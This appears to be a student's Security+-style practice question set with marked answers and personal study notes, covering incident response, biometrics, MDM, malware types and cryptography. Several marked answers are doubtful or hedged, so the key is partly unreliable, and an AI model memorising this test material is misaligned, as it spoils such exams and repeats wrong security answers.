A network engineer and a security engineer are discussing ways to monitor network operations. Which of the following is the BEST method?

A. Disable Telnet and force SSH. B. Establish a continuous ping. C. Utilize an agentless monitor.** D. Enable SNMPv3 with passwords.

The help desk has received calls from users in multiple locations who are unable to access core network services. The network team has identified and turned off the network switches using remote commands. Which of the following actions should the network team take NEXT?

A. Disconnect all external network connections from the firewall. B. Send response teams to the network switch locations to perform updates. C. Turn on all the network switches by using the centralized management software. D. Initiate the organization's incident response plan.**

An incident response technician collected a mobile device during an investigation. Which of the following should the technician do to maintain chain of custody?

A. Document the collection and require a sign-off when possession changes.** B. Lock the device in a safe or other secure location to prevent theft or alteration. C. Place the device in a Faraday cage to prevent corruption of the data. D. Record the collection in a blockchain-protected public ledger.

A security administrator needs to block a TCP connection using the corporate firewall. Because this connection is potentially a threat, the administrator does not want to send back an RST. Which of the following actions in the firewall rule would work BEST?

A. Drop** (no message sent back) B. Reject C. Log alert D. Permit

A security analyst needs to implement security features across smartphones, laptops, and tablets. Which of the following would be the MOST effective across heterogeneous platforms?

A. Enforcing encryption B. Deploying GPOs C. Removing administrative permissions D. Applying MDM software**

Which of the following BEST helps to demonstrate integrity during a forensic investigation?

A. Event logs B. Encryption C. Hashing** (integrity) D. Snapshots

An organization wants to implement a biometric system with the highest likelihood that an unauthorized user will be denied access. Which of the following should the organization use to compare biometric solutions?

A. FRR B. Difficulty of use C. Cost D. FAR** (False Acceptance Rate) E. CER (Crossover Error Rate)

Which biometric error would allow an unauthorized user to access a system?

A. False acceptance B. False entrance C. False rejection D. False denial A

A Chief Information Security Officer has defined resiliency requirements for a new data center architecture. The requirements are as follows:* Critical fileshares will remain accessible during and after a natural disaster.* Five percent of hard disks can fail at any given time without impacting the data.* Systems will be forced to shut down gracefully when battery levels are below 20%.Which of the following are required to BEST meet these objectives? (Choose three.)

A. Fiber switching B. IaC C. NAS D. RAID** E. UPS** F. Redundant power supplies G. Geographic dispersal** H. Snapshots I. Load balancing

Which of the following technologies is used to actively monitor for specific file types being transmitted on the network?

A. File integrity monitoring B. Honeynets C. Tcpreplay D. Data loss prevention**

A company uses specially configured workstations for any work that requires administrator privileges to its Tier 0 and Tier 1 systems. The company follows a strict process to harden systems immediately upon delivery. Even with these strict security measures in place, an incident occurred from one of the workstations. The root cause appears to be that the SoC was tampered with or replaced. Which of the following MOST likely occurred?

A. Fileless malware B. A downgrade attack C. A supply-chain attack** D. A logic bomb E. Misconfigured BIOS

A security analyst notices that specific files are being deleted each time a systems administrator is on vacation. Which of the following BEST describes the type of malware that is running?

A. Fileless virus B. Logic bomb** C. Keylogger D. Ransomware

Multiple beaconing activities to a malicious domain have been observed. The malicious domain is hosting malware from various endpoints on the network. Which of the following technologies would be BEST to correlate the activities between the different endpoints?

A. Firewall B. SIEM** C. IPS D. Protocol analyzer

A security architect is required to deploy to conference rooms some workstations that will allow sensitive data to be displayed on large screens. Due to the nature of the data, it cannot be stored in the conference rooms. The file share is located in a local data center. Which of the following should the security architect recommend to BEST meet the requirement?

A. Fog computing and KVMs B. VDI and thin clients** C. Private cloud and DLP D. Full drive encryption and thick clients

Which of the following secure application development concepts aims to block verbose error messages from being shown in a user's interface?

A. OWASP** (could be either) B. Obfuscation/camouflage C. Test environment D. Prevention of information exposure** (could be either)

A security analyst needs to implement an MDM solution for BYOD users that will allow the company to retain control over company emails residing on the devices and limit data exfiltration that might occur if the devices are lost or stolen. Which of the following would BEST meet these requirements? (Choose two.)

A. Full device encryption B. Network usage rules C. Geofencing D. Containerization** E. Application approve list F. Remote control**

A company is auditing the manner in which its European customers' personal information is handled. Which of the following should the company consult?

A. GDPR (General Data Protection Regulation for EU) B. ISO C. NIST D. PCI DSS A

The Chief Information Security Officer (CISO) has requested that a third-party vendor provide supporting documents that show proper controls are in place to protect customer data. Which of the following would be BEST for the third-party vendor to provide to the CISO?

A. GDPR compliance attestation B. Cloud Security Alliance materials C. SOC 2 Type 2 report** D. NIST RMF workbooks

A security analyst is tasked with defining the "something you are" factor of the company's MFA settings. Which of the following is BEST to use to complete the configuration?

A. Gait analysis B. Vein** C. Soft token D. HMAC-based, one-time password

Field workers in an organization are issued mobile phones on a daily basis. All the work is performed within one city, and the mobile phones are not used for any purpose other than work. The organization does not want these phones used for personal purposes. The organization would like to issue the phones to workers as permanent devices so the phones do not need to be reissued every day. Given the conditions described, which of the following technologies would BEST meet these requirements?

A. Geofencing B. Mobile device management** C. Containerization D. Remote wiping

An organization is planning to open other data centers to sustain operations in the event of a natural disaster. Which of the following considerations would BEST support the organization's resiliency?

A. Geographic dispersal B. Generator power C. Fire suppression D. Facility automation A

An employee's company account was used in a data breach. Interviews with the employee revealed: • The employee was able to avoid changing passwords by using a previous password again. • The account was accessed from a hostile, foreign nation, but the employee has never traveled to any other countries. Which of the following can be implemented to prevent these issues from reoccurring? (Choose two.)

A. Geographic dispersal B. Password complexity C. Password history** D. Geotagging E. Password lockout F. Geofencing**

The Chief Executive Officer (CEO) of an organization would like staff members to have the flexibility to work from home anytime during business hours, including during a pandemic or crisis. However, the CEO is concerned that some staff members may take advantage of the flexibility and work from high-risk countries while on holiday or outsource work to a third-party organization in another country. The Chief Information Officer (CIO) believes the company can implement some basic controls to mitigate the majority of the risk. Which of the following would be BEST to mitigate the CEO's concerns? (Choose two.)

A. Geolocation** B. Time-of-day restrictions** C. Certificates D. Tokens E. Geotagging F. Role-based access controls

A cybersecurity administrator needs to implement a Layer 7 security control on a network and block potential attacks. Which of the following can block an attack atLayer 7? (Choose two.)

A. HIDS B. NIPS** C. HSM D. WAF** E. NAC F. NIDS

The Chief Information Security Officer is concerned about employees using personal email rather than company email to communicate with clients and sending sensitive business information and PII. Which of the following would be the BEST solution to install on the employees' workstations to prevent information from leaving the company's network?

A. HIPS B. DLP** C. HIDS D. EDR

A company recently experienced an inside attack using a corporate machine that resulted in data compromise. Analysis indicated an unauthorized change to the software circumvented technological protection measures. The analyst was tasked with determining the best method to ensure the integrity of the systems remains intact and local and remote boot attestation can take place. Which of the following would provide the BEST solution?

A. HIPS (Host Intrusion Prevention System) B. FIM (File Integrity Monitoring) C. TPM (Trusted Platform Module) D. DLP C

A security analyst is evaluating solutions to deploy an additional layer of protection for a web application. The goal is to allow only encrypted communications without relying on network devices. Which of the following can be implemented?

A. HTTP security header** B. DNSSEC implementation C. SRTP D. S/MIME

Which of the following secure coding techniques makes compromised code more difficult for hackers to use?

A. Obfuscation** B. Normalization C. Execution D. Reuse

A network administrator is concerned about users being exposed to malicious content when accessing company cloud applications. The administrator wants to be able to block access to sites based on the AUP. The users must also be protected because many of them work from home or at remote locations, providing on-site customer support. Which of the following should the administrator employ to meet these criteria?

A. Implement NAC. B. Implement an SWG.** C. Implement a URL filter. D. Implement an MDM.

A business operations manager is concerned that a PC that is critical to business operations will have a costly hardware failure soon. The manager is looking for options to continue business operations without incurring large costs. Which of the following would mitigate the manager's concerns?

A. Implement a full system upgrade. B. Perform a physical-to-virtual migration.** C. Install uninterruptible power supplies. D. Purchase cybersecurity insurance.

Which of the following BEST reduces the security risks introduced when running systems that have expired vendor support and lack an immediate replacement?

A. Implement proper network access restrictions.** B. Initiate a bug bounty program. C. Classify the system as shadow IT. D. Increase the frequency of vulnerability scans.

Which of the following is the BEST action to foster a consistent and auditable incident response process?

A. Incent new hires to constantly update the document with external knowledge. B. Publish the document in a central repository that is easily accessible to the organization.** C. Restrict eligibility to comment on the process to subject matter experts of each IT silo. D. Rotate CIRT members to foster a shared responsibility model in the organization. Reveal Solution

Which of the following should an organization consider implementing in the event executives need to speak to the media after a publicized data breach?

A. Incident response plan B. Business continuity plan C. Communication plan** D. Disaster recovery plan

A company wants to modify its current backup strategy to minimize the number of backups that would need to be restored in case of data loss. Which of the following would be the BEST backup strategy to implement?

A. Incremental backups followed by differential backups B. Full backups followed by incremental backups C. Delta backups followed by differential backups D. Incremental backups followed by delta backups E. Full backups followed by differential backups**

A security analyst has been tasked with ensuring all programs that are deployed into the enterprise have been assessed in a runtime environment. Any critical issues found in the program must be sent back to the developer for verification and remediation. Which of the following BEST describes the type of assessment taking place?

A. Input validation B. Dynamic code analysis** C. Fuzzing D. Manual code review

Which of the following holds staff accountable while escorting unauthorized personnel?

A. Locks B. Badges C. Cameras D. Visitor logs**

A company was recently breached, Part of the company's new cybersecurity strategy is to centralize the logs from all security devices. Which of the following components forwards the logs to a central source?

A. Log enrichment B. Log aggregation C. Log parser D. Log collector**

An organization discovered files with proprietary financial data have been deleted. The files have been recovered from backup, but every time the Chief FinancialOfficer logs in to the file server, the same files are deleted again. No other users are experiencing this issue. Which of the following types of malware is MOST likely causing this behavior?

A. Logic bomb** B. Cryptomalware C. Spyware D. Remote access Trojan

A DBA reports that several production server hard drives were wiped over the weekend. The DBA also reports that several Linux servers were unavailable due to system files being deleted unexpectedly. A security analyst verified that software was configured to delete data deliberately from those servers. No backdoors to any servers were found. Which of the following attacks was MOST likely used to cause the data loss?

A. Logic bomb** B. Ransomware C. Fileless virus D. Remote access Trojans E. Rootkit

A security analyst in a SOC has been tasked with onboarding a new network into the SIEM. Which of the following BEST describes the information that should feed into a SIEM solution in order to adequately support an investigation?

A. Logs from each device type and security layer to provide correlation of events** B. Only firewall logs since that is where attackers will most likely try to breach the network C. Email and web-browsing logs because user behavior is often the cause of security breaches D. NetFlow because it is much more reliable to analyze than syslog and will be exportable from every device

A forensic analyst needs to prove that data has not been tampered with since it was collected. Which of the following methods will the analyst MOST likely use?

A. Look for tampering on the evidence collection bag. B. Encrypt the collected data using asymmetric encryption. C. Ensure proper procedures for chain of custody are being followed. D. Calculate the checksum using a hashing algorithm.**

An amusement park is implementing a biometric system that validates customers' fingerprints to ensure they are not sharing tickets. The park's owner values customers above all and would prefer customers' convenience over security. For this reason, which of the following features should the security team prioritize FIRST?

A. Low FAR B. Low efficacy C. Low FRR** (false rejection rate) D. Low CER

A security administrator is seeking a solution to prevent unauthorized access to the internal network. Which of the following security solutions should the administrator choose?

A. MAC filtering** B. Anti-malware C. Translation gateway D. VPN

An organization is planning to roll out a new mobile device policy and issue each employee a new laptop. These laptops would access the users' corporate operating system remotely and allow them to use the laptops for purposes outside of their job roles. Which of the following deployment models is being utilized?

A. MDM and application management B. BYOD and containers C. COPE and VDI** (Corporate Owned, Personally Enabled) D. CYOD and VMs

A report delivered to the Chief Information Security Officer (CISO) shows that some user credentials could be exfiltrated. The report also indicates that users tend to choose the same credentials on different systems and applications. Which of the following policies should the CISO use to prevent someone from using the exfiltrated credentials?

A. MFA B. Lockout C. Time-based logins D. Password history A

Two organizations plan to collaborate on the evaluation of new SIEM solutions for their respective companies. A combined effort from both organizations' SOC teams would speed up the effort. Which of the following can be written to document this agreement?

A. MOU** (Memorandum of Understanding) B. ISA C. SLA D. NDA

A security analyst has been tasked with finding the maximum amount of data loss that can occur before ongoing business operations would be impacted. Which of the following terms BEST defines this metric?

A. MTTR B. RTO C. RPO** (recovery point objective) D. MTBF

Which of the following would be MOST effective to contain a rapidly spreading attack that is affecting a large number of organizations?

A. Machine learning B. DNS sinkhole** C. Blocklist D. Honeypot

A junior security analyst is conducting an analysis after passwords were changed on multiple accounts without users' interaction. The SIEM have multiple login entries with the following text: suspicious event - user: scheduledtasks successfully authenticate on AD on abnormal time suspicious event - user: scheduledtasks failed to execute c:\weekly_checkups\amazing-3rdparty-domain-assessment.py suspicious event - user: scheduledtasks failed to execute c:\weekly_checkups\secureyourAD-3rdparty-compliance.sh suspicious event - user: scheduledtasks successfully executed c:\weekly_checkups\amazing-3rdparty-domain-assessment.pyWhich of the following is the MOST likely attack conducted on the environment?

A. Malicious script** (.py) B. Privilege escalation C. Domain hijacking D. DNS poisoning

Which of the following describes the exploitation of an interactive process to gain access to restricted areas?

A. Persistence B. Buffer overflow C. Privilege escalation D. Pharming C

A security administrator, who is working for a government organization, would like to utilize classification and granular planning to secure top secret data and grant access on a need-to-know basis. Which of the following access control schemas should the administrator consider?

A. Mandatory** B. Rule-based C. Discretionary D. Role-based

A retail store has a business requirement to deploy a kiosk computer in an open area. The kiosk computer's operating system has been hardened and tested. A security engineer is concerned that someone could use removable media to install a rootkit. Which of the following should the security engineer configure to BEST protect the kiosk computer?

A. Measured boot B. Boot attestation C. UEFI D. EDR** (Endpoint Detection & Response)

Which of the following can reduce vulnerabilities by avoiding code reuse?

A. Memory management B. Stored procedures C. Normalization D. Code obfuscation**

A company is adopting a BYOD policy and is looking for a comprehensive solution to protect company information on user devices. Which of the following solutions would BEST support the policy?

A. Mobile device management** B. Full-device encryption C. Remote wipe D. Biometrics

The marketing department at a retail company wants to publish an internal website to the internet so it is reachable by a limited number of specific, external service providers in a secure manner. Which of the following configurations would be BEST to fulfil this requirement?

A. NAC** (Network Access Control) B. ACL C. WAF D. NAT

A security team discovered a large number of company-issued devices with non-work-related software installed. Which of the following policies would MOST likely contain language that would prohibit this activity?

A. NDA B. BPA C. AUP** D. SLA

A security engineer is concerned that the strategy for detection on endpoints is too heavily dependent on previously defined attacks. The engineer would like a tool to monitor for changes to key files and network traffic on the device. Which of the following tools BEST addresses both detection and prevention?

A. NIDS (network-based intrusion detection system) B. HIPS** (host-based intrusion prevention system) C. AV D. NGFW

A company received a "right to be forgotten" request. To legally comply, the company must remove data related to the requester from its systems. Which of the following is the company MOST likely complying with?

A. NIST CSF B. GDPR** C. PCI DSS D. ISO 27001

A social media company based in North America is looking to expand into new global markets and needs to maintain compliance with international standards.With which of the following is the company's data protection officer MOST likely concerned?

A. NIST Framework B. ISO 27001** C. GDPR D. PCI-DSS

A worldwide manufacturing company has been experiencing email account compromises. In one incident, a user logged in from the corporate office in France, but then seconds later, the same user account attempted a login from Brazil. Which of the following account policies would BEST prevent this type of attack?

A. Network location B. Impossible travel time** C. Geolocation D. Geofencing

Which of the following is the MOST effective control against zero-day vulnerabilities?

A. Network segmentation** B. Patch management C. Intrusion prevention system D. Multiple vulnerability scanners

A security administrator suspects there may be unnecessary services running on a server. Which of the following tools will the administrator MOST likely use to confirm the suspicions?

A. Nmap** B. Wireshark C. Autopsy D. DNSEnum

A security analyst is evaluating the risks of authorizing multiple security solutions to collect data from the company's cloud environment. Which of the following is an immediate consequence of these integrations?

A. Non-compliance with data sovereignty rules B. Loss of the vendors interoperability support C. Mandatory deployment of a SIEM solution D. Increase in the attack surface**

Which of the following is assured when a user signs an email using a private key?

A. Non-repudiation** B. Confidentiality C. Availability D. Authentication

Which of the following would be the BEST resource for a software developer who is looking to improve secure coding practices for web applications?

A. OWASP** B. Vulnerability scan results C. NIST CSF D. Third-party libraries

Which of the following would be used to find the MOST common web-application vulnerabilities?

A. OWASP** (Open Web Application Security Project) B. MITRE ATT&CK C. Cyber Kill Chain D. SDLC

A security engineer is reviewing the logs from a SAML application that is configured to use MFA. During this review, the engineer notices a high volume of successful logins that did not require MFA from users who were traveling internationally. The application, which can be accessed without a VPN, has a policy that allows time-based tokens to be generated. Users who change locations should be required to reauthenticate but have been able to log in without doing so. Which of the following statements BEST explains the issue?

A. OpenID is mandatory to make the MFA requirements work. B. An incorrect browser has been detected by the SAML application. C. The access device has a trusted certificate installed that is overwriting the session token. D. The user's IP address is changing between logins, but the application is not invalidating the token.**

Which of the following BEST describes the process of documenting who has access to evidence?

A. Order of volatility B. Chain of custody** C. Non-repudiation D. Admissibility

A news article states hackers have been selling access to IoT camera feeds. Which of the following is the MOST likely reason for this issue?

A. Outdated software B. Weak credentials** C. Lack of encryption D. Backdoors

After a recent external audit, the compliance team provided a list of several non-compliant, in-scope hosts that were not encrypting cardholder data at rest. Which of the following compliance frameworks would address the compliance team's GREATEST concern?

A. PCI DSS** (Payment Card Industry Data Security Standard) B. GDPR C. ISO 27001 D. NIST CSF

An organization is moving away from the use of client-side and server-side certificates for EAP. The company would like for the new EAP solution to have the ability to detect rogue access points. Which of the following would accomplish these requirements?

A. PEAP B. EAP-FAST** C. EAP-TLS D. EAP-TTLS

Business partners are working on a security mechanism to validate transactions securely. The requirement is for one company to be responsible for deploying a trusted solution that will register and issue artifacts used to sign, encrypt, and decrypt transaction files. Which of the following is the BEST solution to adopt?

A. PKI** (Public Key Infrastructure) B. Blockchain C. SAML D. OAuth

Data exfiltration analysis indicates that an attacker managed to download system configuration notes from a web server. The web-server logs have been deleted, but analysts have determined that the system configuration notes were stored in the database administrator's folder on the web server. Which of the following attacks explains what occurred? (Choose two.)

A. Pass-the-hash B. Directory traversal** C. SQL injection D. Privilege escalation** E. Cross-site scripting F. Request forgery

The president of a regional bank likes to frequently provide SOC tours to potential investors. Which of the following policies BEST reduces the risk of malicious activity occurring after a tour?

A. Password complexity B. Acceptable use C. Access control D. Clean desk**

The new Chief Information Security Officer at a company has asked the security team to implement stronger user account policies. The new policies require: *Users to choose a password unique to their last ten passwords* *Users to not log in from certain high-risk countries* Which of the following should the security team implement? (Choose two.)

A. Password complexity B. Password history** C. Geolocation D. Geofencing** E. Geotagging F. Password reuse

A user enters a username and a password at the login screen for a web portal. A few seconds later the following message appears on the screen:Please use a combination of numbers, special characters, and letters in the password field.Which of the following concepts does this message describe?

A. Password complexity B. Password reuse C. Password history D. Password age A

A security policy states that common words should not be used as passwords. A security auditor was able to perform a dictionary attack against corporate credentials. Which of the following controls was being violated?

A. Password complexity** B. Password history C. Password reuse D. Password length

Against the recommendation of the IT security analyst, a company set all user passwords on a server as `P@55w0rD`. Upon review of the /etc/passwd file, an attacker found the following: alice:a8df3b6c4fd75f0617431fd248f35191df8d237f bob:2d250c5b2976b03d757f324ebd59340df96aa05e chris:ea981ec3285421d014108089f3f3f997ce0f4150Which of the following BEST explains why the encrypted passwords do not match?

A. Perfect forward secrecy B. Key stretching C. Salting** D. Hashing

If a current private key is compromised, which of the following would ensure it cannot be used to decrypt all historical data?

A. Perfect forward secrecy** B. Elliptic-curve cryptography C. Key stretching D. Homomorphic encryption

An organization wants to participate in threat intelligence information sharing with peer groups. Which of the following would MOST likely meet the organization's requirement?

A. Perform OSINT investigations. B. Subscribe to threat intelligence feeds. C. Submit RFCs. D. Implement a TAXII server.**

An administrator needs to protect user passwords and has been advised to hash the passwords. Which of the following BEST describes what the administrator is being advised to do?

A. Perform a mathematical operation on the passwords that will convert them into unique strings. B. Add extra data to the passwords so their length is increased, making them harder to brute force. C. Store all passwords in the system in a rainbow table that has a centralized location. D. Enforce the use of one-time passwords that are changed for every login session. A

An organization has activated an incident response plan due to a malware outbreak on its network. The organization has brought in a forensics team that has identified an internet-facing Windows server as the likely point of initial compromise. The malware family that was detected is known to be distributed by manually logging on to servers and running the malicious code. Which of the following actions would be BEST to prevent reinfection from the infection vector?

A. Prevent connections over TFTP from the internal network. B. Create a firewall rule that blocks a 22 from the internet to the server. C. Disable file sharing over port 445 to the server. D. Block port 3389 inbound from untrusted networks.** (3389-RDP)

The Chief Compliance Officer from a bank has approved a background check policy for all new hires. Which of the following is the policy MOST likely protecting against?

A. Preventing any current employees' siblings from working at the bank to prevent nepotism B. Hiring an employee who has been convicted of theft to adhere to industry compliance C. Filtering applicants who have added false information to resumes so they appear better qualified D. Ensuring no new hires have worked at other banks that may be trying to steal customer information A

A security analyst is designing the appropriate controls to limit unauthorized access to a physical site. The analyst has a directive to utilize the lowest possible budget. Which of the following would BEST meet the requirements?

A. Preventive controls B. Compensating controls C. Deterrent controls** D. Detective controls

Which of the following control types is focused primarily on reducing risk before an incident occurs?

A. Preventive** B. Deterrent C. Corrective D. Detective

A company is considering transitioning to the cloud. The company employs individuals from various locations around the world. The company does not want to increase its on premises infrastructure blueprint and only wants to pay for additional compute power required. Which of the following solutions would BEST meet the needs of the company?

A. Private cloud B. Hybrid environment** C. Managed security service provider D. Hot backup site

A systems engineer wants to leverage a cloud-based architecture with low latency between network-connected devices that also reduces the bandwidth that is required by performing analytics directly on the endpoints. Which of the following would BEST meet the requirements? (Choose two.)

A. Private cloud B. SaaS C. Hybrid cloud** D. IaaS E. DRaaS F. Fog computing**

A major manufacturing company updated its internal infrastructure and just recently started to allow OAuth applications to access corporate data. Data leakage is now being reported. Which of the following MOST likely caused the issue?

A. Privilege creep B. Unmodified default settings** C. TLS protocol vulnerabilities D. Improper patch management

An analyst is reviewing logs associated with an attack. The logs indicate an attacker downloaded a malicious file that was quarantined by the AV solution. The attacker utilized a local non-administrative account to restore the malicious file to a new location. The file was then used by another process to execute a payload. Which of the following attacks did the analyst observe?

A. Privilege escalation B. Request forgeries C. Injection** D. Replay attack

A penetration tester executes the command crontab -l while working in a Linux server environment. The penetration tester observes the following string in the current user's list of cron jobs:*/10 * * * * root /writable/update.shWhich of the following actions should the penetration tester perform NEXT?

A. Privilege escalation** B. Memory leak C. Directory traversal D. Race condition

Which of the following environments utilizes dummy data and is MOST likely to be installed locally on a system that allows code to be assessed directly and modified easily with each build?

A. Production B. Test C. Staging D. Development**

Which of the following controls is used to make an organization initially aware of a data compromise?

A. Protective B. Preventative C. Corrective D. Detective**

An IT security manager requests a report on company information that is publicly available. The manager's concern is that malicious actors will be able to access the data without engaging in active reconnaissance. Which of the following is the MOST efficient approach to perform the analysis?

A. Provide a domain parameter to theHarvester tool.** B. Check public DNS entries using dnsenum. C. Perform a Nessus vulnerability scan targeting a public company's IP. D. Execute nmap using the options: scan all ports and sneaky mode.

On the way into a secure building, an unknown individual strikes up a conversation with an employee. The employee scans the required badge at the door while the unknown individual holds the door open, seemingly out of courtesy, for the employee. Which of the following social engineering techniques is being utilized?

A. Shoulder surfing B. Watering-hole attack C. Tailgating** D. Impersonation

Which of the following would be the BEST way to analyze diskless malware that has infected a VDI?

A. Shut down the VDI and copy off the event logs. B. Take a memory snapshot of the running system.** (diskless means malware exists in memory) C. Use NetFlow to identify command-and-control IPs. D. Run a full on-demand scan of the root volume. Reveal Solution

Which of the following would detect intrusions at the perimeter of an airport?

A. Signage B. Fencing C. Motion sensors D. Lighting E. Bollards C

Which of the following can work as an authentication method and as an alerting mechanism for unauthorized access attempts?

A. Smart card B. Push notifications** C. Attestation service D. HMAC-based E. one-time password

A security forensics analyst is examining a virtual server. The analyst wants to preserve the present state of the virtual server, including memory contents. Which of the following backup types should be used?

A. Snapshot** B. Differential C. Cloud D. Full E. Incremental

An attacker has determined the best way to impact operations is to infiltrate third-party software vendors. Which of the following vectors is being exploited?

A. Social media B. Cloud C. Supply chain** D. Social Engineering

A user enters a password to log in to a workstation and is then prompted to enter an authentication code. Which of the following MFA factors or attributes are being utilized in the authentication process? (Choose two.)

A. Something you know** B. Something you have** C. Somewhere you are D. Someone you know E. Something you are F. Something you can do

Joe, an employee, receives an email stating he won the lottery. The email includes a link that requests a name, mobile phone number, address, and date of birth be provided to confirm Joe's identity before sending him the prize. Which of the following BEST describes this type of email?

A. Spear phishing B. Whaling C. Phishing** D. Vishing

Which of the following is the FIRST environment in which proper, secure coding should be practiced?

A. Stage B. Development** C. Production D. Test

Which of the following would BEST provide a systems administrator with the ability to more efficiently identify systems and manage permissions and policies based on location, role, and service level?

A. Standard naming conventions B. Domain services C. Baseline configurations D. Diagrams A

Which of the following would be indicative of a hidden audio file found inside of a piece of source code?

A. Steganography B. Homomorphic encryption C. Cipher suite D. Blockchain A

A network-connected magnetic resonance imaging (MRI) scanner at a hospital is controlled and operated by an outdated and unsupported specialized Windows OS. Which of the following is MOST likely preventing the IT manager at the hospital from upgrading the specialized OS?

A. The time needed for the MRI vendor to upgrade the system would negatively impact patients. B. The MRI vendor does not support newer versions of the OS.** C. Changing the OS breaches a support SLA with the MRI vendor. D. The IT team does not have the budget required to upgrade the MRI scanner.

An organization recently released a software assurance policy that requires developers to run code scans each night on the repository. After the first night, the security team alerted the developers that more than 2,000 findings were reported and need to be addressed. Which of the following is the MOST likely cause for the high number of findings?

A. The vulnerability scanner was not properly configured and generated a high number of false positives.** B. Third-party libraries have been loaded into the repository and should be removed from the codebase. C. The vulnerability scanner found several memory leaks during runtime, causing duplicate reports for the same issue. D. The vulnerability scanner was not loaded with the correct benchmarks and needs to be updated.

A user wanted to catch up on some work over the weekend but had issues logging in to the corporate network using a VPN. On Monday, the user opened a ticket for this issue but was able to log in successfully. Which of the following BEST describes the policy that is being implemented?

A. Time-based logins** B. Geofencing C. Network location D. Password history

Which of the following is the MOST likely reason for securing an air-gapped laboratory HVAC system?

A. To avoid data leakage* B. To protect surveillance logs C. To ensure availability** D. To facilitate third-party access

Which of the following is the BEST reason to maintain a functional and effective asset management policy that aids in ensuring the security of an organization?

A. To provide data to quantify risk based on the organization's systems** B. To keep all software and hardware fully patched for known vulnerabilities C. To only allow approved, organization-owned devices onto the business network D. To standardize by selecting one laptop model for all users in the organization

Which of the following is a reason to publish files' hashes?

A. To validate the integrity of the files B. To verify if the software was digitally signed C. To use the hash as a software activation key D. To use the hash as a decryption passphrase A

The database administration team is requesting guidance for a secure solution that will ensure confidentiality of cardholder data at rest only in certain fields in the database schema. The requirement is to substitute a sensitive data field with a non-sensitive field that is rendered useless if a data breach occurs. Which of the following is the BEST solution to meet the requirement?

A. Tokenization** B. Masking C. Full disk encryption D. Mirroring

Which of the following actions would be recommended to improve an incident response process?

A. Train the team to identify the difference between events and incidents.** B. Modify access so the IT team has full access to the compromised assets. C. Contact the authorities if a cybercrime is suspected. D. Restrict communication surrounding the response to the IT team.

The board of directors at a company contracted with an insurance firm to limit the organization's liability. Which of the following risk management practices does this BEST describe?

A. Transference** B. Avoidance C. Mitigation D. Acknowledgement

A research company discovered that an unauthorized piece of software has been detected on a small number of machines in its lab. The researchers collaborate with other machines using port 445 and on the Internet using port 443. The unauthorized software is starting to be seen on additional machines outside of the lab and is making outbound communications using HTTPS and SMB. The security team has been instructed to resolve the problem as quickly as possible while causing minimal disruption to the researchers. Which of the following contains the BEST course of action in this scenario?

A. Update the host firewalls to block outbound SMB. B. Place the machines with the unapproved software in containment. C. Place the unauthorized application in a blocklist.** D. Implement a content filter to block the unauthorized software communication.

A technician was dispatched to complete repairs on a server in a data center. While locating the server, the technician entered a restricted area without authorization. Which of the following security controls would BEST prevent this in the future?

A. Use appropriate signage to mark all areas. B. Utilize cameras monitored by guards. C. Implement access control vestibules. D. Enforce escorts to monitor all visitors. C

As part of a security compliance assessment, an auditor performs automated vulnerability scans. In addition, which of the following should the auditor do to complete the assessment?

A. User behavior analysis B. Packet captures C. Configuration reviews D. Log analysis**

A tax organization is working on a solution to validate the online submission of documents. The solution should be carried on a portable USB device that should be inserted on any computer that is transmitting a transaction securely. Which of the following is the BEST certificate for these requirements?

A. User certificate** B. Self-signed certificate C. Computer certificate D. Root certificate

A company recently experienced a significant data loss when proprietary information was leaked to a competitor. The company took special precautions by using proper labels; however, email filter logs do not have any record of the incident. An investigation confirmed the corporate network was not breached, but documents were downloaded from an employee's COPE tablet and passed to the competitor via cloud storage. Which of the following is the BEST remediation for this data leak?

A. User training B. CASB C. MDM D. DLP**

While reviewing an alert that shows a malicious request on one web application, a cybersecurity analyst is alerted to a subsequent token reuse moments later on a different service using the same single sign-on method. Which of the following would BEST detect a malicious actor?

A. Utilizing SIEM correlation engines** B. Deploying Netflow at the network border C. Disabling session tokens for all sites D. Deploying a WAF for the web server

An organization would like to give remote workers the ability to use applications hosted inside the corporate network. Users will be allowed to use their personal computers, or they will be provided organization assets. Either way, no data or applications will be installed locally on any user systems. Which of the following mobile solutions would accomplish these goals?

A. VDI** B. MDM C. COPE D. UTM

A network engineer created two subnets that will be used for production and development servers. Per security policy production and development servers must each have a dedicated network that cannot communicate with one another directly. Which of the following should be deployed so that server administrators can access these devices?

A. VLANs B. Internet proxy servers C. NIDS D. Jump servers**

Which of the following concepts BEST describes tracking and documenting changes to software and managing access to files and systems?

A. Version control** B. Continuous monitoring C. Stored procedures D. Automation

A customer service representative reported an unusual text message that was sent to the help desk. The message contained an unrecognized invoice number with a large balance due and a link to click for more details. Which of the following BEST describes this technique?

A. Vishing B. Whaling C. Phishing D. Smishing**

Which of the following would MOST likely be identified by a credentialed scan but would be missed by an uncredentialed scan?

A. Vulnerabilities with a CVSS score greater than 6.9. B. Critical infrastructure vulnerabilities on non-IP protocols.* (could be this) C. CVEs related to non-Microsoft systems such as printers and switches. D. Missing patches for third-party software on Windows workstations and servers.**

NEED TO DO QUESTION 42

Come back and fill in

Review Questions #153-158

Review Questions #153-158


Conjuntos de estudio relacionados

LD 35 - Firearms and Chemical Agents

View Set

Business Law Exam 1 Review Question Batch Questions ch. 6-10

View Set

Biology Practice Exam 1 (Ch.22-25)

View Set

GOVT 2305: UNIT 1 Smartbook CH 11

View Set

Abnormal Psychology Exam 4 Module 10

View Set

AP World History (AP Classroom) Questions U7

View Set

Anatomy respiration III - Pleurae, lungs and tracheobronchial tree

View Set

exam 5 immune questions ch 17, 20

View Set